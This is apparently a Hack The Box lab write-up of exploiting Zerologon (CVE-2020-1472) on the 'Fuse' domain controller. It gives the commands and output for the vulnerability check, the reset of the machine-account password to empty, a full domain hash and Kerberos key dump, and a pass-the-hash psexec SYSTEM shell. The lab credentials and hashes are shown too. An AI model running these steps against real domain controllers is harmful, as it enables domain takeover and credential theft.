CVE-2020-1472

zerologon attack enables an unauthenticated attacker to remotely escalate their privileges straight to Domain Admin, with network access to a domain controller as the only requirement.

the vulnerability is present at an insecure implementation of AES-CFB8 in the MS-NRPC by brute-forcing the authentication up to 256 times with a challenge and ciphertext consisting of 8 zero-bytes \x00', resulting the eventual match that leads to authentication bypass as the machine account. It then resets the password empty.

more about this vulnerability here

The target system is likely vulnerable given the fact that it is running Windows Server 2016 and no patch was installed

exploit (zerologon)

I got the exploit script from the GitHub repo

Testing

┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u bnielson -p Qwer1234 -M zerologon
smb         10.10.10.193    445    fuse             [*] windows server 2016 standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
smb         10.10.10.193    445    fuse             [+] fabricorp.local\bnielson:Qwer1233 
ZEROLOGO... 10.10.10.193    445    FUSE             VULNERABLE
zerologo... 10.10.10.193    445    fuse             next step: https://github.com/dirkjanm/CVE-2020-1472

Confirmed! For this exploit, I don’t even need to a credential

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2020-1472]
└─$ python3 ZeroLogon.py fuse $IP
Performing authentication attempts...
=================================
Target vulnerable, changing account password to empty string
 
Result: 0
 
Exploit complete!

Done! It should have know set the machine account’s password to empty; (FUSE$) As shown, I never supplied a credential.

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2020-1472]
└─$ impacket-secretsdump 'fabricorp.local/fuse$@fuse.fabricorp' -target-ip $IP -dc-ip $IP -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] remoteoperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd:::
tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2:::
svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536:::
mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80:::
dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161:::
fuse$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win-qqorj74hxte$:10601:aad3b435b51404eeaad3b435b51404ee:d488a6ff29b28a99faa98ea31d1dd164:::
win-nwdsepb5h7m$:10602:aad3b435b51404eeaad3b435b51404ee:9a746886a67b834b0bf47d5843bac22f:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984
administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68
administrator:des-cbc-md5:0dfe83ce576d8aae
krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e
krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6
krbtgt:des-cbc-md5:49d93d43321f02b3
svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754
svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99
svc-print:des-cbc-md5:fea11fdf6bd3105b
bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6
bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32
bnielson:des-cbc-md5:9826c42010254a76
sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5
sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9
sthompson:des-cbc-md5:4f9291c46291ba02
tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525
tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f
tlavel:des-cbc-md5:2a238576ab7a6213
pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7
pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710
pmerton:des-cbc-md5:ef3794940d6d0120
svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c
svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56
svc-scan:des-cbc-md5:e30b208ccecd57ad
bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74
bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336
bhult:des-cbc-md5:4a1a209d4532a7b9
dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce
dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8
dandrews:des-cbc-md5:9ec2b53eae6b20f2
mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a
mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da
mberbatov:des-cbc-md5:8023a16b9b3d5186
astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735
astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b
astein:des-cbc-md5:254f802902f8ec7a
dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0
dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762
dmuir:des-cbc-md5:7fb515d59846498a
fuse$:aes256-cts-hmac-sha1-96:ba250f2101ecad1a2aa8fab0c95d7a66b59c904eb0edd47121f51ff561f3fb2e
fuse$:aes128-cts-hmac-sha1-96:bf995eed47e2a8849b72e95eabd5a929
fuse$:des-cbc-md5:b085ab974ff1e049
win-qqorj74hxte$:aes256-cts-hmac-sha1-96:aff53fbe21e11ea262cc42eddc253aa9c5e5fe5db2ef77772e1ddeac2c0d0330
win-qqorj74hxte$:aes128-cts-hmac-sha1-96:a3744ca333bb7c56360d8d23dcf2837a
win-qqorj74hxte$:des-cbc-md5:299e89ecf7673bae
win-nwdsepb5h7m$:aes256-cts-hmac-sha1-96:c1735a355f300c970196d0da025ddb3a23e1d5563e339aa8c70e12ceb0c2a60f
win-nwdsepb5h7m$:aes128-cts-hmac-sha1-96:5e613b277b8da60425b027e3823c3a78
win-nwdsepb5h7m$:des-cbc-md5:fb1ac4a48fad10f1
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2020-1472]
└─$ impacket-psexec fabricorp.local/administrator@fuse.fabricorp.local -target-ip $IP -dc-ip $IP -no-pass -hashes 'aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file XgmbyzuM.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service otWv on 10.10.10.193.....
[*] Starting service otWv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
Fuse
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::a503:3c1b:a607:49b2
   Link-local IPv6 Address . . . . . : fe80::a503:3c1b:a607:49b2%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

InfoSec LAB

Explorer

Fuse_Privilege_Escalation_5

CVE-2020-1472

exploit (zerologon)

Testing

Exploitation

Hashdump

Shelldrop

Interactive Graph View

Table of Contents

Backlinks